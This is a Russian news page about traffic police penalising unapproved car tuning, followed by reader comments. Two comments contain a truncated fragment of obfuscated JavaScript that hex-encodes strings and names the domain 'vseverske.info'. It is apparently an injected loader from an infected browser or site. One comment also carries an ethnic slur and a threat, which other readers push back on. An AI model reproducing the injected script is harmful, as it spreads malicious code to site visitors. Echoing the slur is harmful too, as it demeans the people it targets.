Последние комментарии:

вчера в 10:37 написал lucyzm60
позавчера в 21:55 написал ponni
позавчера в 17:50 написал f1gv83
позавчера в 14:35 написал БЕлена
18.01.2022 08:35 написал f1gv83
17.01.2022 21:43 написал ТЕРРАН
17.01.2022 19:21 написал ponni
17.01.2022 15:30 написал A59
16.01.2022 10:23 написал барыга
15.01.2022 20:23 написал tractor
15.01.2022 20:17 написал ТЕРРАН
15.01.2022 20:15 написал ТЕРРАН
15.01.2022 20:13 написал ТЕРРАН
13.01.2022 12:07 написал Кот
13.01.2022 11:08 написал f1gv83


Автотюнинг вне закона!


Автотюнинг вне закона!

Всем автомобилистам известно, что вносить изменения в конструкцию транспортного средства без согласования с ГИБДД запрещается. Однако, переделки автолюбителей долгое время оставались без должного внимания со стороны представителей закона. Все зачастую сводилось к плановым рейдам с участием инспекторов технадзора, в которых проверялся общественный и грузовой транспорт. Теперь, кажется, под удар попали все без исключения: стритрейсеры, владельцы внедорожников и легковых тюнингованных авто, включая транспортные средства с газобаллонным оборудованием.

Социальные сети разрываются от негодования автомобилистов, рассказывающих о том, как их оштрафовали и обязали под угрозой прекращения регистрации ТС исправить выявленные при осмотре нарушения. Во многих регионах у любителей экспериментировать со своим железным конем начались проблемы.

На первый взгляд ничего страшного, ведь ответственность за подобное нарушение минимальная – предупреждение или штраф 500 рублей (ч. 1 ст. 12.5 КоАП РФ), но инспекторы в таких случаях стали применять п. 7.18 приложения к Основным положениям по допуску ТС к эксплуатации ПДД, согласно которому эксплуатация ТС запрещается, если в его конструкцию внесены изменения без разрешения ГИБДД МВД или иных органов, определяемых Правительством РФ.

В теории причину нарушения можно устранить на месте, но избавиться от силового железного бампера или лебедки быстро не получится, да и кто обрадуется такому подходу к ситуации? Однако, другая перспектива не обрадует тоже - вашу машину просто отправят на штрафстоянку! Вдобавок выдадут предписание в определенный срок исправить выявленные нарушения и предоставить автомобиль на осмотр в МРЭО по месту его регистрации.

И вот тут начинается самое интересное: отказ могут преподнести как неповиновение законному требованию сотрудника полиции (ч. 1 ст. 19.3 КоАП РФ), что уже может обойтись не только в 500-1000 рублей, но и арестом на 15 суток! К тому же, регистрацию ТС могут аннулировать, как не соответствующую требованиям безопасности дорожного движения и ваш любимый автомобиль превращается в движимую недвижимость до устранения неисправностей.





Категория: Новости » Россия » Авто

Комментарии: (17) 

12 июня 2016   5

Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.
 

Комментарий № 1:

Написал: sovetnik
Средства с газобаллонным оборудованием с какого перепуга туда поподают если сертифицированная контора устанавливала, а не переоборудовала. С таким успехом сигнализации и ходовые огни вне закона.

Комментарий № 2:

Написал: Evgen 2
Давно пора занятся идиотами на отпущенных ТАЗах. Именно на отпущенных. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 3:

Написал: ololo
Evgen 2,
Комп на вирусы проверь и дополнения в браузере лишние отключи. А то фигня какая то в сообщениях пишется у тебя.

Комментарий № 4:

Написал: npocTo_BURLIK
ну ладно " гонщики " ( дебилы )  с прямотоками ... их можно е...ать и нужно , чтоб не шумели , но чем им поднятый джип то не угодил ... едет тихо , ни кому не мешает ... 

Комментарий № 5:

Написал: KBakA
npocTo_BURLIK,
Государству нужны деньги, вот и взялись за тюнеров..... это только начало....

Комментарий № 6:

Написал: GNOM
npocTo_BURLIK,
полностью согласен!!!

Комментарий № 7:

Написал: единый сервис
массовых не повиновений,с продолжениями  не опасаются ,?наши органы !

Комментарий № 8:

Написал: Kucheryava
sovetnik,
Двигатель заводом сертифицирован?

Комментарий № 9:

Написал: Spatz

А вы проедте позади такого джипа в сырую погоду узнаете) У нас ездит такой по городу белый без брызговиков даже.

Комментарий № 10:

Написал: npocTo_BURLIK
поедь в сырую погоду за камазом с брызговиками ( их то по больше чем таких джипов ) .... уделают еще хуже ! 

Комментарий № 11:

Написал: ПолиграфПолиграфович
Evgen 2,
может пора пизди.ь чурбанов. Ехал вчера и у.бок на бмв вылез, бородатый. Я остановился, посмотрел ему в глаза... в 96 не дадовили гнид

Комментарий № 12:

Написал: vvm
ПолиграфПолиграфович, у у..ков на бмв или на чём-то ещё нет национальности, по-моему. на дороге мы все равны по сути. русских долб..в разве мало за рулём ездит?

Комментарий № 13:

Написал: Evgen 2
ПолиграфПолиграфович,
Причём тут начиональность? У меня сосед ездит на ВАЗ 07. без всякого тюнингово говна. Машинка как с конвейера. Отличный добрейший дядька, хоть и дегестанец. и что? Только за то что он дегестанец, наде до него докапаться???? А он между прочим со своего огорода кормит детский дом. и БЕСПЛАТНО.  А ты что сделал доброго, хоть и русский????
  // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 14:

Написал: BVD
С газобаллонами давно надо запретить ездить, при авариях баллоны взрываются и от людей ничего не остается, только наши безголовные губернские ивласти рекомендуют ездить нагазовых  баллонах, не думая о роследствиях, и ,зная, что они ненаказуемы. 

Комментарий № 15:

Написал: BVD
На баллонах может ездить сам водитель, но пассажиров он не смеет возить, т. к. кто ответит за смерть пассажиров при аварии , погибших при взрыве баллонов, губернатор отмажется, хоть он и главным виновником будет.

Комментарий № 16:

Написал: sovetnik
Сигнализация то же переоборудованием счидается?

Комментарий № 17:

Написал: driver45
Такое впечатление, ч то с Москвы звиздюль прилетел. Мол "Шото-то вы мало работаете". Вот и решили потрясти граждан. Имитация бурной деятельности(ИБД).  Тюнинг - это главная беда российских дорог!!! Одно радует, что на всех джиперов сотрудников технадзора не хватит(инспектор ГИБДД на сколько я знаю не имеет права осуществлять техосмотр). А учредителям таких акций остаётся тьолько пожелать - жён вам хороших и детей послушных...
stroimguru.ru
Курс валюты:
76.86 97↑   $     87.13 18↑  

Опрос дня:

Вы будете делать прививку от коронавируса?

Нет   45.9%
   
Да, планирую   9.84%
   
Да, но если заставят (на работе / для путешествий)   6.56%
   
Уже сделал   27.87%
   
Затрудняюсь ответить   9.84%
   
Всего голосов: 61

Все опросы >>

Архив статей: